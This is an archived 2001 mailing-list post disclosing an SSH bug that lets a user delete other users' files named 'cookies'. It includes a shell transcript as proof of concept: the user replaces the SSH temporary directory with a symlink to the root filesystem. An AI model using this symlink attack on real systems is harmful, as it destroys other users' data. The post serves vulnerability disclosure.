Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
From: zen-parsegmx.net
Date: Mon Jun 04 2001 - 05:14:29 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    SSH allows deletion of other users files.

    You can delete any file on the filesystem you want...

    as long as its called cookies.

    Not really a very useful bug, but could cause annoyances to
    people who actually like their cookies.


    sample exploit:-

     [rootclarity /root]# touch /cookies;ls /cookies
     [rootclarity /root]# ssh zenlocalhost
     zenlocalhost's password:
     Last login: Mon Jun 4 20:22:39 2001 from localhost.local
     Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
     [zenclarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
     [zenclarity zen]$ logout
     Connection to localhost closed.
     [rootclarity /root]# ls /cookies
     /bin/ls: /cookies: No such file or directory